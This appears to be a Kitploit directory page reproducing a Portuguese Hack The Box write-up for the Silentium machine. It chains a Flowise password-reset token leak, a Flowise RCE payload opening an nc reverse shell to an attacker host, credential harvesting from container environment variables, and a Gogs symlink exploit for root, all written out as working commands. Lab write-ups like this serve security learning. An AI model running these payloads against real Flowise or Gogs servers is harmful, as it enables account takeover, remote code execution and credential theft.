Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
HTB-Silentium-Writeup — Hack The Box - Writeup da máquina Silentium | CVE-2025-58434, CVE-2025-59528, CVE-2025-8110 | Kitploit
Ferramentas/GitHubGitHub/twappz/htb-silentium-writeup
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança WebCTFTestes de PenetraçãoAprendizado e EducaçãoEscape de Contêiner
GitHubtwappz/htb-silentium-writeup

HTB-Silentium-Writeup

Hack The Box - Writeup da máquina Silentium | CVE-2025-58434, CVE-2025-59528, CVE-2025-8110

1há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

HTB - Silentium Writeup

Hack The Box Difficulty OS

Informações da Máquina

  • Nome: Silentium
  • SO: Linux
  • Dificuldade: Fácil
  • CVEs: CVE-2025-58434, CVE-2025-59528, CVE-2025-8110

Enumeração

Varredura Nmap

root@kitploit:~
nmap -sC -sV -p- --min-rate 5000 <IP> -oN nmap.txt

Portas abertas: 22 (SSH), 80 (HTTP)

Hosts Virtuaisstaging.silentium.htb roda Flowise 3.0.5


Foothold — RCE no Flowise

CVE-2025-58434 — Vazamento do Token de Redefinição de Senha sem Autenticação

O endpoint de esqueci a senha vaza o tempToken diretamente na resposta da API.

root@kitploit:~
curl -s http://staging.silentium.htb/api/v1/account/forgot-password \
  -X POST -H "Content-Type: application/json" \
  -d '{"user":{"email":"[email protected]"}}'

Use o tempToken vazado para redefinir a senha:

root@kitploit:~
curl -s http://staging.silentium.htb/api/v1/account/reset-password \
  -X POST -H "Content-Type: application/json" \
  -d '{"user":{"email":"[email protected]","tempToken":"<TOKEN>","password":"Hacked123!"}}'

CVE-2025-59528 — RCE Autenticado via CustomMCP

Faça login para obter a chave da API e então dispare o RCE:

root@kitploit:~
curl -s http://staging.silentium.htb/api/v1/node-load-method/customMCP \
  -X POST \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <API_KEY>" \
  -d '{"loadMethod":"listActions","inputs":{"mcpServerConfig":"({x:(()=>{process.mainModule.require(\"child_process\").exec(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <LHOST> 443 >/tmp/f\");return 1;})()})"}}'

Consegui uma shell dentro do container Docker como root.


Fuga do Container

Verifiquei as variáveis de ambiente:

root@kitploit:~
env

Credenciais encontradas:

  • FLOWISE_USERNAME=ben
  • FLOWISE_PASSWORD=F1l3_d0ck3r

SSH para o host:

root@kitploit:~
ssh ben@<IP>

Escalação de Privilégio — Gogs CVE-2025-8110

Gogs rodando internamente na porta 3001 como root.

Configure o túnel SSH:

root@kitploit:~
ssh -L 8080:127.0.0.1:3001 ben@<IP>

Registrei uma conta no Gogs via http://127.0.0.1:8080 e gerei o token de API.

CVE-2025-8110 — Bypass de Symlink na API PutContents

Usei o exploit do TYehan:

root@kitploit:~
python3 exploit.py \
  --url http://127.0.0.1:8080 \
  --username <user> \
  --password <pass> \
  --token <token> \
  --host <LHOST> \
  --port 4446

Consegui shell root! 🎉


Flags

  • Flag de usuário: /home/ben/user.txt
  • Flag de root: /root/root.txt

Ferramentas Utilizadas

  • nmap
  • curl
  • ffuf
  • netcat
  • Python3

Referências

  • CVE-2025-58434
  • CVE-2025-59528
  • CVE-2025-8110 Adicionado ao /etc/hosts:
Baixar ferramenta